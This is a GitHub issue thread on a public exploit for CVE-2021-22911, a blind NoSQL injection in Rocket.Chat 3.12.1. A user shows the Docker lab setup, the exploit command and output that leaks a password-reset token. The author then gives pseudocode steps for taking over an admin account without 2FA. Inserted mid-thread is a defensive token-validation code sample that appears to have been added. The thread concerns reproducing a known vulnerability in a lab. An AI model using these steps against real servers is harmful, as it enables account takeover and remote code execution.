CsEnox / CVE-2021-22911

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

Is section Environment complete? #1

Closed RegularITCat closed 3 years ago

RegularITCat commented 3 years ago

I tried to check your exploit.

As said in the Environment section of the Readme, I built a test environment with

docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1

after that, I executed the script as

python3 exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://localhost:80"

the script ended with

[+] Resetting user@rocket.local password
[+] Password Reset Email Sent
Got: U
Got: UN
Got: UNU
Got: UNUg
Got: UNUg2
Got: UNUg2f
Got: UNUg2fJ
Got: UNUg2fJ-
Got: UNUg2fJ-I
Got: UNUg2fJ-IE
Got: UNUg2fJ-IE6
Got: UNUg2fJ-IE6P
Got: UNUg2fJ-IE6Pt
Got: UNUg2fJ-IE6Ptc
Got: UNUg2fJ-IE6Ptco
Got: UNUg2fJ-IE6PtcoK
Got: UNUg2fJ-IE6PtcoKd
Got: UNUg2fJ-IE6PtcoKdN
Got: UNUg2fJ-IE6PtcoKdNP
Got: UNUg2fJ-IE6PtcoKdNPm
Got: UNUg2fJ-IE6PtcoKdNPmg
Got: UNUg2fJ-IE6PtcoKdNPmg1
Got: UNUg2fJ-IE6PtcoKdNPmg1K
Got: UNUg2fJ-IE6PtcoKdNPmg1Kv
Got: UNUg2fJ-IE6PtcoKdNPmg1Kvl
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlX
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXw
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-c
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ce
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceY
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYN
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNU
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUy
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyG
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGf
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfR
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJ
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJL
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLI
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[+] Got token : UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[-] Wrong token

Do I understand correctly that the problem is that I didn't fill the Rocket Chat database with users?

Could you add the necessary comments to the Environment section to fully recreate the exploitation?

P.S. I'm sorry for being a dummy xd

P.P.S. And great work btw
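One defensive check against the injection class this thread is about, added here as an illustration and not taken from the CVE-2021-22911 repository or from Rocket.Chat itself: a blind NoSQL injection through a password-reset token only works if the token reaches the database query as something other than a plain string. Validating the type and shape of the token before the lookup removes that route. The 43-character URL-safe base64 format is an assumption modelled on the token in the log above, and the field name, record layout and sample records are constructed for the example.

```javascript
// Added example, not code from the CVE-2021-22911 repository or from Rocket.Chat.
// Validate a password-reset token as a plain string of the expected shape
// before it is used in any database query, so a query object can never be
// substituted for it. Token format (43 chars, URL-safe base64) is assumed.
const RESET_TOKEN_RE = /^[A-Za-z0-9_-]{43}$/;

// True only for a string in the expected token format. Objects, arrays,
// numbers, wrong lengths and unexpected characters are all rejected, which
// closes the injection route regardless of which driver builds the query.
function isValidResetToken(value) {
  return typeof value === 'string' && RESET_TOKEN_RE.test(value);
}

// Defence in depth: detect query-operator keys ($-prefixed) anywhere inside a
// value parsed from untrusted JSON. Suitable as a generic request-body filter
// in front of any query that is built from user-controlled input.
function containsQueryOperator(value) {
  if (Array.isArray(value)) return value.some(containsQueryOperator);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith('$') || containsQueryOperator(v),
    );
  }
  return false;
}

// Stand-in for a collection lookup such as
//   Users.findOne({ 'services.password.reset.token': token })
// over an in-memory list of user records (field name is an assumption).
// Returns { user, rejected } so a caller can log rejected attempts: a burst
// of rejections against the reset endpoint is a useful detection signal.
function findUserByResetToken(users, token) {
  if (!isValidResetToken(token)) {
    return { user: null, rejected: true };
  }
  const user = users.find((u) => u.resetToken === token) || null;
  return { user, rejected: false };
}

// Constructed sample records; tokens are made up, same shape as in the log.
const SAMPLE_USERS = [
  { email: 'admin@rocket.local', resetToken: 'A'.repeat(43) },
  { email: 'user@rocket.local', resetToken: 'B'.repeat(43) },
];

// Small self-check that can be run directly with node.
function demo() {
  const good = findUserByResetToken(SAMPLE_USERS, 'A'.repeat(43));
  const bad = findUserByResetToken(SAMPLE_USERS, { $ne: '' });
  return { goodEmail: good.user && good.user.email, badRejected: bad.rejected };
}

module.exports = { isValidResetToken, containsQueryOperator, findUserByResetToken, SAMPLE_USERS, demo };
```

The type check is the part that matters: once the token is guaranteed to be a string, the query can only ever match an exact value, and the character-by-character leak the log above shows has nothing to test against. The operator scan is an extra layer for request bodies that are passed into queries elsewhere.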

CsEnox commented 3 years ago

There are more things to do sir.

NOTE: If the admin doesn't have 2FA you can customize the code:
1) Send forgot password mail
2) Get reset token for admin
3) Change the password using the reset token retrieved

# Admin Account Takeover [ No 2fa ]
forgotpassword(adminmail,target)
token = resettoken(target)
changingpassword(target,token)

I should probably add this information to environment setup.

CsEnox commented 3 years ago

@RegularITCat if you have any more questions you can DM me on Discord 😄 Enox#4458